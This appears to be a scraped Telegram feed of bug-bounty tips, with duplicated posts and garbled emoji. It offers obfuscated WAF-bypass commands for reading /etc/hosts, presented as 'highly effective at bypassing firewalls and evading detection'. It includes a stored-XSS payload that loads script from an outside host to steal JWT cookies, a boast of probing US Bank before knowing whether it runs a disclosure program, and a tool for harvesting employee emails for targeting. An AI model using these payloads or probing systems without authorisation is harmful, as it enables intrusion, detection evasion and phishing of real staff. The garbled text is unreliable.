This is really cool π₯
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
π13π₯2
β‘Bypass Series for bug huntersπ
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
Guys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β it's really awesome!π
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
rev /etc/hosts | revod -An -c /etc/hosts | tr -d ' 'cat $HOME/../../etc/hostscat ${PWD}/../../../etc/hostsgrep "" /etc/hostscut -c1- /etc/hostspaste /etc/hostsGuys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β it's really awesome!π
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯9β€7π5
β‘Bash Series for bug huntersπ
Part-2
Create multiple folders using one-liner:
This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
File creates like file1.txt, file2.txt file3.txt
Generating Files with Numeric Sequences:
This sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt
Boost your bug hunting with pro Bash commands β a must for every hacker!
Don't forget to reactπ₯
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Create multiple folders using one-liner:
mkdir {dev,test,prod}This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
touch {file1,file2,file3}.txtFile creates like file1.txt, file2.txt file3.txt
Generating Files with Numeric Sequences:
seq -w 1 10 | xargs -I {} touch file{}.txtThis sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt
Boost your bug hunting with pro Bash commands β a must for every hacker!
Don't forget to reactπ₯
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯13π4
program-list.json
1.1 MB
πHelpful Websites for Finding Bug Bounty and Vulnerability Disclosure Programs.β‘
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format, provided the JSON file.
Don't forget to react π₯
π Follow me ππΌ DarkShadow
#BugBountytips
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format, provided the JSON file.
π Follow me ππΌ
#BugBountytips
π₯22π3π€2
β‘Popular HackerOne target Agoda.com was vulnerable to Stored XSS β Rewarded $3,200π¬
πCore Issue:
By adding a new property (Apartment/Flat) and injecting a malicious script, the backend failed to properly sanitize user input. Validation was only enforced on the frontend.
πAffected Functionality:
Property listing creation, including:
ββ’ Property Name
ββ’ Property Description
ββ’ Company Name
ββ’ Company Address
π₯Injection Payload:
π₯Impact:
On page load, the stored XSS steals the userβs JWT token from cookies, enabling full account takeover with zero user interaction.
π Follow meππΌ DarkShadow
#BugBountytips
πCore Issue:
By adding a new property (Apartment/Flat) and injecting a malicious script, the backend failed to properly sanitize user input. Validation was only enforced on the frontend.
πAffected Functionality:
Property listing creation, including:
ββ’ Property Name
ββ’ Property Description
ββ’ Company Name
ββ’ Company Address
π₯Injection Payload:
"><script src=https://hackbx.bxss.in></script>
This single payload can be used to execute thousands of XSS scripts.
π₯Impact:
On page load, the stored XSS steals the userβs JWT token from cookies, enabling full account takeover with zero user interaction.
π Follow meππΌ DarkShadow
#BugBountytips
πΏ12β€4π₯4π1π¨βπ»1
What do you think about these kinds of proof-of-concepts and bug bounty tips?
Drop your thoughts in the comments β Iβd love to hear your feedback and what you'd like to see next!πβ€οΈ
Drop your thoughts in the comments β Iβd love to hear your feedback and what you'd like to see next!πβ€οΈ
β€24π11
We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they donβt even mention or credit us after copying our content.
π25β€13π’4
Brut Security pinned Β«We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they donβt even mention or credit us after copying our content.Β»
β‘Bypass Series for bug huntersπ
Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
guys, these are some custom payloads I personally crafted β highly effective at bypassing firewalls and evading detection.
For more follow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tar cf - /etc/hosts | tar xf - -O gzip -c /etc/hosts | gzip -dless /e*c/h*st*more /e{t,c}*/{o,h}*s*{s,t}strings /??c/??stssort /etc/hosts | uniq guys, these are some custom payloads I personally crafted β highly effective at bypassing firewalls and evading detection.
For more follow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯13π€3π2π¨βπ»2
Only 6 hours... and boom!
Found multiple critical vulnerabilities in US Bank β including:
Why you guys not following me yet?
It's like walking into a digital vault with no lock... just saying.
Ethically hacking to protect, not to exploit.
Does anyone know if they have a bug bounty or responsible disclosure program?
Found multiple critical vulnerabilities in US Bank β including:
Leaked sensitive information
Hardcoded auth credentials
Unprotected sensitive endpoints
Unauthenticated access to the dashboard
And more juicy stuff...
ο»Ώ
Why you guys not following me yet?
It's like walking into a digital vault with no lock... just saying.
Ethically hacking to protect, not to exploit.
Does anyone know if they have a bug bounty or responsible disclosure program?
π±23π11β€2
π»Nuclei AI Prompts is a platform that offers a collection of ready-to-use security prompts for Nuclei. It helps penetration testers and security researchers speed up their work by providing prompts for common vulnerabilities like XSS, SQLi, RCE, and more. You can easily copy these prompts and use them in your security testing, and even contribute new ones to help grow the community.
β Join Telegram - t.iss.one/brutsecurity
π₯nucleiprompts.com
#cybersecurity #bugbounty #bugbountytips #nuclei
β Join Telegram - t.iss.one/brutsecurity
π₯nucleiprompts.com
#cybersecurity #bugbounty #bugbountytips #nuclei
π5π₯5β€1π€1
Discovering a Business Logic Flow Bug (Low-Hanging Fruit)
Try my this simple method to identify a common business logic flaw:
But wait β before you continue...
If you're not following me yet, what are you doing?
π§ͺ Exploitation Steps:
1. Register a new account and take note of the username you used.
2. Verify and activate the account.
3. Delete the account.
4. Now, try registering again using the same username β observe what happens.
If the server still blocks or reserves the username after the account is deleted, congratulations! You've just uncovered a Business Logic Flow bugπ
#BugBountytips
Try my this simple method to identify a common business logic flaw:
But wait β before you continue...
If you're not following me yet, what are you doing?
π§ͺ Exploitation Steps:
1. Register a new account and take note of the username you used.
2. Verify and activate the account.
3. Delete the account.
4. Now, try registering again using the same username β observe what happens.
If the server still blocks or reserves the username after the account is deleted, congratulations! You've just uncovered a Business Logic Flow bugπ
#BugBountytips
π16π3π₯2π«‘2π¨βπ»1πΏ1
collect emails, usernames from commit history of repos of an org from GitHub for more personalized targeting of employees
ghintel.secrets.ninja
ghintel.secrets.ninja
β€20π4π₯1π’1
What do you think is the most underrated vulnerability?
Anonymous Poll
39%
1. Business Logic Flaws
16%
2. Race Conditions
14%
3. Vulnerabilities in package.json
13%
4. Insecure Deserialization
19%
5. HTTP Request Smuggling
β€4π€2